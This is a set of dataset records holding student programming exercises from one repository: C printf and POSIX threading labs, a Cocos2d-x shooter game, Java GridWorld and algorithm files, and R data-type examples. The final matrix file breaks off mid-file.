by format to the standard output\");\n puts(\"\\nformat\");\n puts(\"%[flags][width][.preecision][length]specifier\");\n puts(\"specifier\t: d, i, u, o, x, f, e, g, a, c, s, p, n, %\");\n puts(\"flags\t\t: -, +, (space), #, 0\");\n puts(\"width\t\t: (number), *\");\n puts(\"precision\t: (.number), (.*)\");\n puts(\"specifiers\t: hh, h, l, ll, j, z, t, L\");\n}\n\nvoid practice_basic() {\n unsigned num = 520;\n float num2 = 520.12;\n \n printf(\"signed decimal integer %d\\n\", (int)num);\n printf(\"unsigned decimal integer %u\\n\", num);\n printf(\"unsigned octal %o\\n\", num);\n printf(\"unsigned hexadecimal integer %x\\n\", num);\n printf(\"decimal float point %f\\n\", num2);\n printf(\"scientific notation (mantissa/exponent), lowecase %e\\n\", num2);\n}\n\nvoid practice_master() {\n float num = 520.1314;\n\n printf(\"|+%f|\\n\", num);\n printf(\"| %f|\\n\", num);\n printf(\"|%+20f|\\n\", num);\n printf(\"|% 20f|\\n\", num);\n printf(\"|%-20f|\\n\", num);\n printf(\"|%-*.*f|\\n\", 20, 2, num);\n printf(\"|%20.2f|\\n\", num);\n}\n\nvoid practice() {\n practice_basic();\n practice_master();\n}\n\nint main() {\n usage();\n practice();\n\n unsigned i = -1;\n printf(\"%u\\t\", i);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.5692307949066162, "avg_line_length": 15.909090995788574, "blob_id": "7b89053e1437f9c11137c56f221194792c2ba75a", "content_id": "e07bc87a935a27b0300b5a7e5274b1ee4bdbde48", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 195, "license_type": "permissive", "max_line_length": 46, "num_lines": 11, "path": "/c/hardwork/library/string/strchr.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <string.h>\r\n\r\nint main() {\r\n\r\n const char str[] = \"Hello World!\";\r\n char const * const index = strchr(str, 'e');\r\n fprintf(stdout, \"%c\", *index);\r\n\r\n return 0;\r\n}" }, { "alpha_fraction": 0.6225895285606384, "alphanum_fraction": 0.6323373317718506, "avg_line_length": 25.077348709106445, "blob_id": "76432470f2ac8c9f852d4386777970b8815fe0e0", "content_id": "c863e8a296f2baae73a317fb084d8ebb46b93f50", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5033, "license_type": "permissive", "max_line_length": 79, "num_lines": 181, "path": "/c/projects/POSIX/Lab3/3.1.produce_consume.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * 生产者消费者问题\n * 读入测试数据文件,按照要求运行进程。\n * jskyzero 2017(R)\n */\n\n#include <stdio.h> // for fopen(), perror()\n#include <stdlib.h> // for exit(), atoi(), malloc(), free()\n#include <string.h> // for strtok()\n#include <unistd.h> // for sleep()\n#include <pthread.h> // for pthread_create(), pthread_exit()\n#include <semaphore.h> // for sem_t, sem_wait(), sem_post()\n\n// buffer size\n#define BUFFER_SIZE 5\n// max 4 num, each max 10 char, so we let buffer be 50\n#define LINE_BUFFER_SIZE 50\n// this file is copy from powerpoint\n#define FILE_NAME \"3.1.testfile\"\n// for strtok()\n#define KEY_STR \" \"\n// for product_id\n#define HAVA_PRODUCT_ID_TYPE 'P'\n// if you need DEBUG, then uncomment it\n// #define DEBUG_TAG 1\n\n// buffer item type\ntypedef int buffer_data_type;\n// test data store type\ntypedef struct test_data {\n int index; // 正整数,表示线程序号。\n char type; // 相应线程角色,P表示生产者,C表示消费者。\n int begin_time; // 正数,表示存放或取出操作的开始时间\n int duration; // 正数,表示操作的持续时间。\n buffer_data_type product_id; // 正数(仅生产者有),表示生产的产品号。\n} test_data_type;\n\nint buffer_index;\nbuffer_data_type buffer[BUFFER_SIZE];\nsem_t empty, full, mutex;\n\nvoid read_file_work();\nvoid line_buffer_to_test_data(char *, test_data_type *);\nvoid print_test_data(test_data_type *);\nvoid work_with_test_data(test_data_type *);\nvoid *produce(void *data);\nvoid *consume(void *data);\nint insert_item(buffer_data_type);\nint remove_item(buffer_data_type *);\n\nint main() {\n // empty 与full 将采用标准计数信号量,而mutex 将采用二进制信号量。\n sem_init(&mutex, 0, 1); // empty (以记录有多少空位)\n sem_init(&empty, 0, BUFFER_SIZE); // full (以记录有多少满位)\n sem_init(&full, 0, 0); // 保护对缓冲插入与删除的操作\n // Main Part\n read_file_work();\n // creat and then destory\n sem_destroy(&mutex);\n sem_destroy(&empty);\n sem_destroy(&full);\n // wait wait for all pthreads to complete\n pthread_exit(0);\n}\n\nint insert_item(buffer_data_type item) {\n if (buffer_index < BUFFER_SIZE) {\n buffer[buffer_index] = item;\n buffer_index++;\n return 0;\n } else {\n return -1;\n }\n}\n\nint remove_item(buffer_data_type *item) {\n if (buffer_index > 0) {\n *item = buffer[--buffer_index];\n return 0;\n } else {\n return -1;\n }\n}\n\nvoid *produce(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&empty);\n sem_wait(&mutex);\n printf(\"ProduceID:%10d \", data->index);\n if (insert_item(data->product_id)) {\n perror(\"INSERT ERROR\\n\");\n } else {\n printf(\"InsertData:%10d\\n\", data->product_id);\n }\n free(data);\n sleep(data->duration);\n sem_post(&mutex);\n sem_post(&full);\n return (NULL);\n}\n\nvoid *consume(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&full);\n sem_wait(&mutex);\n buffer_data_type buffer_item;\n printf(\"ConsumeID:%10d \", data->index);\n if (remove_item(&buffer_item)) {\n perror(\"REMOVE ERROR\\n\");\n } else {\n printf(\"RemoveData:%10d\\n\", buffer_item);\n }\n free(data);\n sleep(data->duration);\n sem_post(&mutex);\n sem_post(&empty);\n return (NULL);\n}\n\nvoid work_with_test_data(test_data_type *data) {\n pthread_t thread;\n if (data->type == HAVA_PRODUCT_ID_TYPE) {\n pthread_create(&thread, NULL, produce, (void *)data);\n } else {\n pthread_create(&thread, NULL, consume, (void *)data);\n }\n}\n\nvoid print_test_data(test_data_type *data) {\n printf(\"|index:%10d|type:%c|begin_time:%10d|duration:%10d|product_id%10d|\\n\",\n data->index, data->type, data->begin_time, data->duration,\n data->product_id);\n}\n\nvoid line_buffer_to_test_data(char *line, test_data_type *data) {\n char *pch = strtok(line, KEY_STR);\n data->index = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->type = pch[0];\n pch = strtok(NULL, KEY_STR);\n data->begin_time = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->duration = atoi(pch);\n if (data->type == HAVA_PRODUCT_ID_TYPE) {\n pch = strtok(NULL, KEY_STR);\n data->product_id = atoi(pch);\n } else {\n data->product_id = 0;\n }\n}\n\nvoid read_file_work() {\n // malloc buffer\n char *line_buffer = (char *)malloc(sizeof(char) * LINE_BUFFER_SIZE);\n if (line_buffer == NULL) {\n perror(\"malloc faile\\n\");\n exit(-1);\n }\n // open file\n FILE *test_file = fopen(FILE_NAME, \"r\");\n if (test_file == NULL) {\n perror(\"File open failed\\n\");\n exit(-1);\n }\n // readfile and process\n while (fgets(line_buffer, LINE_BUFFER_SIZE, test_file) != NULL) {\n test_data_type *line_test_data =\n (test_data_type *)malloc(sizeof(test_data_type));\n line_buffer_to_test_data(line_buffer, line_test_data);\n#ifdef DEBUG_TAG\n print_test_data(line_test_data);\n#endif\n work_with_test_data(line_test_data);\n }\n // free malloc data\n free(line_buffer);\n // close file\n fclose(test_file);\n}" }, { "alpha_fraction": 0.5696682333946228, "alphanum_fraction": 0.593364953994751, "avg_line_length": 24.14285659790039, "blob_id": "8dbfb8db6b5feaf951608f9624b0bcc6528c95cb", "content_id": "33d387bfaa20e4a2a0dccfafb363d01656f12a27", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1291, "license_type": "permissive", "max_line_length": 66, "num_lines": 42, "path": "/c/projects/POSIX/Lab1/2.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 编制一段程序,使用系统调用fork()创建两个子程序,再用系统调用signal()让父进程捕捉键盘上来的中断信号(即按Ctrl\n// C键),当捕捉到中断信号后,父进程调用kill()向两个子进程发出信号,子进程捕捉到信号后,分别输出下面信息后终止:\n// child process 1 is killed by parent!\n// child process 2 is killed by parent!\n// 父进程等待两个子进程终止后,输出以下信息后终止:\n// parent process is killed!\n\n#include <signal.h> // for signal()\n#include <stdio.h> // for puts()\n#include <stdlib.h> // for exit()\n#include <unistd.h> // for fork()\n\nint pid_1, pid_2;\n\nvoid process_signal(int sign_num) {\n // printf(\"%d %d \\n\", pid_1, pid_2);\n if (pid_1 > 0 && pid_2 > 0) {\n // int kill(pid_t pid, int sig);\n kill(pid_1, SIGINT);\n kill(pid_2, SIGINT);\n // pid_t wait(int *wstatus);\n while ((wait(NULL))!= -1)\n ;\n puts(\"parent process is killed!\\n\");\n exit(0);\n } else if (pid_1 == 0) {\n puts(\"child process 1 is killed by parent!\\n\");\n exit(0);\n } else if (pid_2 == 0) {\n puts(\"child process 2 is killed by parent!\\n\");\n exit(0);\n }\n}\n\nint main() {\n signal(SIGINT, process_signal);\n if ((pid_1 = fork())) {\n pid_2 = fork();\n }\n while (1)\n ;\n}" }, { "alpha_fraction": 0.4025973975658417, "alphanum_fraction": 0.4350649416446686, "avg_line_length": 18.3125, "blob_id": "7258efb71f01359405b0b1fbf64811a00b21bdff", "content_id": "4eed7e40e8a5bb47d941b9ed0b8cd2c64cb6cd75", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 308, "license_type": "permissive", "max_line_length": 42, "num_lines": 16, "path": "/java/projects/algorithms/chapter1/part1/Q34.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q34\n */\npublic class Q34 {\n public static void main(String[] args) {\n // about the size program use\n // max min : O(1)\n // mean : O(N)\n // Kth : O(1)\n // sum n^2 : O(1)\n // mean : O(1)\n // > mean : O(N)\n // sort : O(N)\n // random : O(1) not vary random\n }\n}" }, { "alpha_fraction": 0.6521984934806824, "alphanum_fraction": 0.675483226776123, "avg_line_length": 25.64759063720703, "blob_id": "8abc74d8b6aa90dff1c5b46ef191f3075fc8e517", "content_id": "f51a6e27235dc1a9b8ed73327080af07f485ff0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9363, "license_type": "permissive", "max_line_length": 125, "num_lines": 332, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week13/Classes/Thunder.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "GB18030", "text": "#include \"Thunder.h\"\n#include <algorithm>\n\nUSING_NS_CC;\n\nusing namespace CocosDenshion;\n\nScene* Thunder::createScene() {\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = Thunder::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\nbool Thunder::init() {\n\tif (!Layer::init()) {\n\t\treturn false;\n\t}\n\n\tisMove = false; // 是否点击飞船\n\tvisibleSize = Director::getInstance()->getVisibleSize();\n\n\t// 创建背景\n\tauto bgsprite = Sprite::create(\"bg.jpg\");\n\tbgsprite->setPosition(visibleSize / 2);\n\tbgsprite->setScale(visibleSize.width / bgsprite->getContentSize().width,\n\t\tvisibleSize.height / bgsprite->getContentSize().height);\n\tthis->addChild(bgsprite, 0);\n\n\t// 创建飞船\n\tplayer = Sprite::create(\"player.png\");\n\tplayer->setAnchorPoint(Vec2(0.5, 0.5));\n\tplayer->setPosition(visibleSize.width / 2, player->getContentSize().height);\n\tplayer->setName(\"player\");\n\tthis->addChild(player, 1);\n\n\t// 显示陨石和子弹数量\n\tenemysNum = Label::createWithTTF(\"enemys: 0\", \"fonts/arial.TTF\", 20);\n\tenemysNum->setColor(Color3B(255, 255, 255));\n\tenemysNum->setPosition(50, 60);\n\tthis->addChild(enemysNum, 3);\n\tbulletsNum = Label::createWithTTF(\"bullets: 0\", \"fonts/arial.TTF\", 20);\n\tbulletsNum->setColor(Color3B(255, 255, 255));\n\tbulletsNum->setPosition(50, 30);\n\tthis->addChild(bulletsNum, 3);\n\n\taddEnemy(5); // 初始化陨石\n\tpreloadMusic(); // 预加载音乐\n\tplayBgm(); // 播放背景音乐\n\texplosion(); // 创建爆炸帧动画\n\n\t// 添加监听器\n\taddTouchListener();\n\taddKeyboardListener();\n\taddCustomListener();\n\n\t// 调度器\n\tschedule(schedule_selector(Thunder::update), 0.04f, kRepeatForever, 0);\n\treturn true;\n}\n\n//预加载音乐文件\nvoid Thunder::preloadMusic() {\n\tauto audio = SimpleAudioEngine::getInstance();\n\n\taudio->preloadBackgroundMusic(\"music/bgm.mp3\");\n\taudio->preloadEffect(\"music/explore.wav\");\n\taudio->preloadEffect(\"music/fire.wav\");\n}\n\n//播放背景音乐\nvoid Thunder::playBgm() {\n\tSimpleAudioEngine::getInstance()->playBackgroundMusic(\"music/bgm.mp3\", true);\n}\n\n//初始化陨石\nvoid Thunder::addEnemy(int n) {\n\tenemys.clear();\n\tfor (unsigned i = 0; i < 3; ++i) {\n\t\tchar enemyPath[20];\n\t\tsprintf(enemyPath, \"stone%d.png\", 3 - i);\n\t\tdouble width = visibleSize.width / (n + 1.0),\n\t\t\theight = visibleSize.height - (50 * (i + 1));\n\t\tfor (int j = 0; j < n; ++j) {\n\t\t\tauto enemy = Sprite::create(enemyPath);\n\t\t\tenemy->setAnchorPoint(Vec2(0.5, 0.5));\n\t\t\tenemy->setScale(0.5, 0.5);\n\t\t\tenemy->setPosition(width * (j + 1), height);\n\t\t\tenemys.push_back(enemy);\n\t\t\taddChild(enemy, 1);\n\t\t}\n\t}\n}\n\n// 陨石向下移动并生成新的一行(加分项)\nvoid Thunder::newEnemy() {\n\tfor (Sprite* s : enemys) {\n\t\tif (s != NULL) {\n\t\t\ts->setPosition(s->getPosition() + Vec2(0, -50));\n\t\t}\n\t}\n\n\tint n = 5;\n\tstatic int j;\n\tfor (unsigned i = 0; i < 1; ++i) {\n\t\tchar enemyPath[20];\n\t\tsprintf(enemyPath, \"stone%d.png\", j % 3 + 1);\n\t\tj++;\n\t\tdouble width = visibleSize.width / (n + 1.0),\n\t\t\theight = visibleSize.height - (50 * (i + 1));\n\t\tfor (int j = 0; j < n; ++j) {\n\t\t\tauto enemy = Sprite::create(enemyPath);\n\t\t\tenemy->setAnchorPoint(Vec2(0.5, 0.5));\n\t\t\tenemy->setScale(0.5, 0.5);\n\t\t\tenemy->setPosition(width * (j + 1) - 80, height);\n\t\t\tenemys.push_back(enemy);\n\t\t\taddChild(enemy, 1);\n\t\t}\n\t}\n}\n\n// 移动飞船\nvoid Thunder::movePlane(char c) {\n\tint x = (c == 'A' ? -1 : 1) * 8;\n\tplayer->setPosition(player->getPosition() + Vec2(x, 0));\n}\n\n//发射子弹\nvoid Thunder::fire() {\n\tauto bullet = Sprite::create(\"bullet.png\");\n\tbullet->setAnchorPoint(Vec2(0.5, 0.5));\n\tbullets.push_back(bullet);\n\tbullet->setPosition(player->getPosition());\n\taddChild(bullet, 1);\n\tSimpleAudioEngine::getInstance()->playEffect(\"music/fire.wav\", false);\n\n\t// 移除飞出屏幕外的子弹\n\tauto seq = Sequence::create(MoveBy::create(1.0f, Vec2(0, visibleSize.height)),\n\t\tCallFunc::create([&, bullet]() {bullets.remove(bullet); }),\n\t\tnullptr);\n\n\tbullet->runAction(seq);\n}\n\n// 切割爆炸动画帧\nvoid Thunder::explosion() {\n\tauto texture = Director::getInstance()->getTextureCache()->addImage(\"explosion.png\");\n\texplore.reserve(8);\n\tfor (int i = 0; i < 8; i++)\n\t{\n\t\tauto frame = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(188.8 * i, (i / 6) * 160, 188.8, 160)));\n\t\texplore.pushBack(frame);\n\t}\n}\n\nvoid Thunder::update(float f) {\n\t// 实时更新页面内陨石和子弹数量(不得删除)\n\t// 要求数量显示正确(加分项)\n\tchar str[15];\n\tsprintf(str, \"enemys: %d\", enemys.size());\n\tenemysNum->setString(str);\n\tsprintf(str, \"bullets: %d\", bullets.size());\n\tbulletsNum->setString(str);\n\n\t// 飞船移动\n\tif (isMove)\n\t\tthis->movePlane(movekey);\n\n\tstatic int ct = 0;\n\tstatic int dir = 4;\n\t++ct;\n\tif (ct == 120)\n\t\tct = 40, dir = -dir;\n\telse if (ct == 80) {\n\t\tdir = -dir;\n\t\tnewEnemy(); // 陨石向下移动并生成新的一行(加分项)\n\t}\n\telse if (ct == 20)\n\t\tct = 40, dir = -dir;\n\n\t//陨石左右移动\n\tfor (Sprite* s : enemys) {\n\t\tif (s != NULL) {\n\t\t\ts->setPosition(s->getPosition() + Vec2(dir, 0));\n\t\t}\n\t}\n\n\t// 分发自定义事件\n\tEventCustom e(\"meet\");\n\t_eventDispatcher->dispatchEvent(&e);\n}\n\n// 自定义碰撞事件\nvoid Thunder::meet(EventCustom * event) {\n\t// 判断子弹是否打中陨石并执行对 应操作\n\tfor each (auto it1 in bullets)\n\t{\n\t\tbool hasBoom = false;\n\n\t\tfor each (auto it2 in enemys)\n\t\t{\n\t\t\tif (!hasBoom)\n\t\t\t{\n\t\t\t\tif (it1->getPosition().getDistance((it2->getPosition())) < 25)\n\t\t\t\t{\n\t\t\t\t\tit2->runAction(Sequence::create(\n\t\t\t\t\t\tAnimate::create(Animation::createWithSpriteFrames(explore, 0.05f, 1)),\n\t\t\t\t\t\tAnimate::create(Animation::createWithSpriteFrames(explore, 0.05f, 1)),\n\t\t\t\t\t\tCallFunc::create([it2] {it2->removeFromParentAndCleanup(true); }),\n\t\t\t\t\t\tCallFunc::create([&, it2] {enemys.remove(it2); }),\n\t\t\t\t\t\tNULL));\n\t\t\t\t\tit1->runAction(Sequence::create(\n\t\t\t\t\t\tFadeOut::create(0.02f),\n\t\t\t\t\t\tCallFunc::create([it1] {it1->removeFromParentAndCleanup(true); }),\n\t\t\t\t\t\tCallFunc::create([&, it1] {bullets.remove(it1); }),\n\t\t\t\t\t\tNULL));\n\n\t\t\t\t\tSimpleAudioEngine::getInstance()->playEffect(\"music/explore.wav\", false);\n\t\t\t\t\thasBoom = true;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// 判断游戏是否结束并执行对应操作\n\tfor each (auto it2 in enemys)\n\t{\n\t\tif (player->getPositionY() > it2->getPositionY() - 50)\n\t\t{\n\t\t\tSimpleAudioEngine::getInstance()->pauseBackgroundMusic();\n\n\t\t\t_eventDispatcher->removeAllEventListeners();\n\t\t\tunschedule(schedule_selector(Thunder::update));\n\n\t\t\tplayer->runAction(Sequence::create(\n\t\t\t\tAnimate::create(Animation::createWithSpriteFrames(explore, 0.05f, 1)),\n\t\t\t\tCallFunc::create([&] {player->removeFromParentAndCleanup(true); }),\n\t\t\t\tNULL));\n\t\t\tSimpleAudioEngine::getInstance()->playEffect(\"music/explore.wav\", false);\n\n\t\t\tauto gameover = Sprite::create(\"gameOver.png\");\n\t\t\tgameover->setAnchorPoint(Vec2(0.5, 0.5));\n\t\t\tgameover->setPosition(visibleSize.width / 2,\n\t\t\t\tvisibleSize.height / 2 - gameover->getContentSize().height);\n\t\t\tgameover->setName(\"player\");\n\t\t\tthis->addChild(gameover, 1);\n\t\t}\n\t}\n}\n\n// 添加自定义监听器\nvoid Thunder::addCustomListener() {\n\tauto meetListener = EventListenerCustom::create(\"meet\", CC_CALLBACK_1(Thunder::meet, this));\n\t_eventDispatcher->addEventListenerWithFixedPriority(meetListener, 1);\n}\n\n// 添加键盘事件监听器\nvoid Thunder::addKeyboardListener() {\n\tauto keyboardListener = EventListenerKeyboard::create();\n\tkeyboardListener->onKeyPressed = CC_CALLBACK_2(Thunder::onKeyPressed, this);\n\tkeyboardListener->onKeyReleased = CC_CALLBACK_2(Thunder::onKeyReleased, this);\n\n\t_eventDispatcher->addEventListenerWithFixedPriority(keyboardListener, 1);\n}\n\nvoid Thunder::onKeyPressed(EventKeyboard::KeyCode code, Event* event) {\n\tswitch (code) {\n\tcase EventKeyboard::KeyCode::KEY_LEFT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_A:\n\tcase EventKeyboard::KeyCode::KEY_A:\n\t\tmovekey = 'A';\n\t\tisMove = true;\n\t\tbreak;\n\tcase EventKeyboard::KeyCode::KEY_RIGHT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_D:\n\tcase EventKeyboard::KeyCode::KEY_D:\n\t\tmovekey = 'D';\n\t\tisMove = true;\n\t\tbreak;\n\tcase EventKeyboard::KeyCode::KEY_SPACE:\n\t\tfire();\n\t\tbreak;\n\t}\n}\n\nvoid Thunder::onKeyReleased(EventKeyboard::KeyCode code, Event* event) {\n\tswitch (code) {\n\tcase EventKeyboard::KeyCode::KEY_LEFT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_A:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_A:\n\tcase EventKeyboard::KeyCode::KEY_RIGHT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_D:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_D:\n\t\tisMove = false;\n\t\tbreak;\n\t}\n}\n\n// 添加触摸事件监听器\nvoid Thunder::addTouchListener() {\n\tauto touchListener = EventListenerTouchOneByOne::create();\n\ttouchListener->onTouchBegan = CC_CALLBACK_2(Thunder::onTouchBegan, this);\n\ttouchListener->onTouchEnded = CC_CALLBACK_2(Thunder::onTouchEnded, this);\n\ttouchListener->onTouchMoved = CC_CALLBACK_2(Thunder::onTouchMoved, this);\n\n\t_eventDispatcher->addEventListenerWithFixedPriority(touchListener, 1);\n}\n\nbool Thunder::onTouchBegan(Touch *touch, Event *event) {\n\tfire();\n\tisClick = true;\n\treturn true;\n}\n\nvoid Thunder::onTouchEnded(Touch *touch, Event *event) {\n\tisClick = false;\n}\n\n// 当鼠标按住飞船后可控制飞船移动 (加分项)\nvoid Thunder::onTouchMoved(Touch *touch, Event *event) {\n\tif (isClick && player->getBoundingBox().containsPoint(touch->getLocation()))\n\t{\n\t\tplayer->setPosition(touch->getLocation());\n\t}\n}\n" }, { "alpha_fraction": 0.3736951947212219, "alphanum_fraction": 0.43110647797584534, "avg_line_length": 17.784313201904297, "blob_id": "e8492c5b26baefb28c3cae148d16b2c16baa78ba", "content_id": "14df9e5982a933a7875693ad7d44c1d13b7a0893", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 958, "license_type": "permissive", "max_line_length": 75, "num_lines": 51, "path": "/c/hardwork/hardway/5.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\nchar a[505][30];\n\nint strcmp2(const char *str1, const char *str2) {\n char ch1, ch2;\n while (*str1 == *str2 || abs(*str1 - *str2) == 32) {\n if (*str1 == '\\0') return 0;\n str1++;\n str2++;\n }\n if (*str1 < 'Z')\n ch1 = *str1 + 32;\n else\n ch1 = *str1;\n if (*str2 < 'Z')\n ch2 = *str2 + 32;\n else\n ch2 = *str2;\n\n return ch1 - ch2;\n}\n\nvoid sort(int n) {\n char temp[30];\n for (int i = 0; i < n - 1; i++) {\n for (int j = 0; j < n - 1; j++) {\n if (strcmp2(a[j], a[j + 1]) > 0) {\n strcpy(temp, a[j]);\n strcpy(a[j], a[j + 1]);\n strcpy(a[j + 1], temp);\n }\n }\n }\n}\nint main() {\n int N;\n scanf(\"%d\", &N);\n for (int i = 0; i < N; i++) {\n scanf(\"%s\", a[i]);\n }\n sort(N);\n for (int i = 0; i < N; i++) {\n if (abs(strcmp(a[i], a[i + 1])) == 32 || strcmp(a[i], a[i + 1]) == 0) {\n continue;\n } else\n printf(\"%s\\n\", a[i]);\n }\n}\n" }, { "alpha_fraction": 0.5372999310493469, "alphanum_fraction": 0.5493808388710022, "avg_line_length": 27.791303634643555, "blob_id": "36d98979cad82ba2f54fe7bb16621db00aab711e", "content_id": "c214a7cd593d93501646d400904bdbc399df8842", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3311, "license_type": "permissive", "max_line_length": 79, "num_lines": 115, "path": "/java/projects/gridworld/Part4/BlusterCritter/src/BlusterCritter.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/* \n * AP(r) Computer Science GridWorld Case Study:\n * Copyright(c) 2005-2006 Cay S. Horstmann (http://horstmann.com)\n *\n * This code is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation.\n *\n * This code is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n * \n * @author Chris Nevison\n * @author Barbara Cloud Wells\n * @author Cay Horstmann\n */\n\nimport info.gridworld.actor.Actor;\nimport info.gridworld.actor.Critter;\nimport info.gridworld.grid.Location;\n\nimport java.awt.Color;\nimport java.util.ArrayList;\n\n/**\n * A <code>BlusterCritter</code> takes on the color of neighboring actors as\n * it moves through the grid. <br />\n * The implementation of this class is testable on the AP CS A and AB exams.\n */\npublic class BlusterCritter extends Critter\n{\n\n private int courage;\n private final double DARKENING_FACTOR = 0.05;\n\n public BlusterCritter(int courage)\n {\n this.courage = courage;\n }\n\n\n /**\n * Gets the actors for processing. Implemented to return the actors that\n * occupy neighboring grid locations. Override this method in subclasses to\n * look elsewhere for actors to process.<br />\n * Postcondition: The state of all actors is unchanged.\n * @return a list of actors that this critter wishes to process.\n */\n public ArrayList<Actor> getActors()\n {\n \n ArrayList<Actor> Ans = new ArrayList<Actor>();\n int row = getLocation().getRow();\n int column = getLocation().getCol();\n\n for (int i = row - 2; i <= row + 2; i ++)\n {\n for (int j = row - 2; j <= column + 2; j++)\n {\n if (i == row && j == column)\n {\n continue;\n }\n\n Location tempLoc = new Location(i, j);\n if (getGrid().isValid(tempLoc))\n {\n Actor tempActor = getGrid().get(tempLoc);\n if (tempActor != null)\n {\n Ans.add(tempActor); \n }\n }\n \n }\n }\n return Ans;\n }\n\n\n\n /**\n * Randomly selects a neighbor and changes this critter's color to be the\n * same as that neighbor's. If there are no neighbors, no action is taken.\n */\n public void processActors(ArrayList<Actor> actors)\n {\n\n int size = 0;\n for (Actor a : actors)\n {\n if ((a instanceof Critter))\n size++;\n }\n\n Color c = getColor();\n int red = c.getRed();\n int green = c.getGreen();\n int blue =c.getBlue();\n if (courage <= size) \n {\n red = (int) (red * (1 - DARKENING_FACTOR));\n green = (int) (green * (1 - DARKENING_FACTOR ));\n blue = (int) (blue * (1 - DARKENING_FACTOR ));\n } \n else \n {\n red = red < 255 ? red+1 : 255;\n green = green < 255 ? green+1 : 255;\n blue = blue < 255 ? blue+1 : 255;\n }\n setColor(new Color(red, green, blue));\n }\n}\n" }, { "alpha_fraction": 0.6006884574890137, "alphanum_fraction": 0.6299483776092529, "avg_line_length": 15.166666984558105, "blob_id": "75a65c1bce7aa7bc6e7ba2b16596381ff8bdf374", "content_id": "3dd1eded2f5fb986c91d9c79020235f39ef38986", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 581, "license_type": "permissive", "max_line_length": 69, "num_lines": 36, "path": "/R/harwork/hardway/datatype.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Data type in R\n\n# basic data type\nv <- 2L\nprint(class(v));\nv <- 12.3;\nprint(class(v));\nv <- TRUE;\nprint(class(v));\nv <- \"hello\"\nprint(class(v));\nv <- charToRaw(\"hello\")\nprint(class(v));\n\n# use basic to construct high-level\n\n# vector\ncolors <- c(\"red\", \"green\", \"yello\")\nprint(colors)\nprint(class(colors))\n\n# list\ndocument <- list(colors, \"my colors\")\nprint(document)\nprint(class(document))\n\n# matrix\nmatrix <- matrix(c(11, 12, 21, 22), nrow = 2, ncol = 2, byrow = TRUE)\nprint(matrix)\n\n# array \narray <- array(c(\"green\", \"yellow\"), dim = c(3, 3, 2))\nprint(array)\n\n# factor\n# frame" }, { "alpha_fraction": 0.5599415302276611, "alphanum_fraction": 0.5678362846374512, "avg_line_length": 23.78985595703125, "blob_id": "e19344f1b4d96907b5ddb06b233e17691c5ca279", "content_id": "086273db30b2be69bde1761738642dcbf91585a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3420, "license_type": "permissive", "max_line_length": 79, "num_lines": 138, "path": "/c/projects/POSIX/Lab2/2.2.matrix.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <assert.h> // for assert()\n#include <pthread.h> // for pthread_*\n#include <stdio.h> // for printf(),fopen(), fgets()\n#include <stdlib.h> // for atoi(), malloc(), free()\n#include <string.h> // for memset()\n\n#define MATRIX_MAX_SIZE 1000\n#define BUFFER_SIZE (4 * MATRIX_MAX_SIZE)\n#define DATA_FILE_NAME \"2.2.data.csv\"\n#define KEY_STR \",\"\n\n// don't need test now\n// #define READ_TEST 1\n#define ANS_TEST 1\n\n// argument struct type\nstruct ARGU {\n int row;\n int column;\n int ans;\n};\n\ntypedef struct ARGU ARGU_TYPE;\n\n// global data\nint A[MATRIX_MAX_SIZE][MATRIX_MAX_SIZE], B[MATRIX_MAX_SIZE][MATRIX_MAX_SIZE];\nint A_row, A_B, B_column;\n\nvoid read_file();\nvoid *calcute(void *);\n\nint main() {\n read_file();\n void *return_value; // actually no use\n int ans[MATRIX_MAX_SIZE][MATRIX_MAX_SIZE];\n 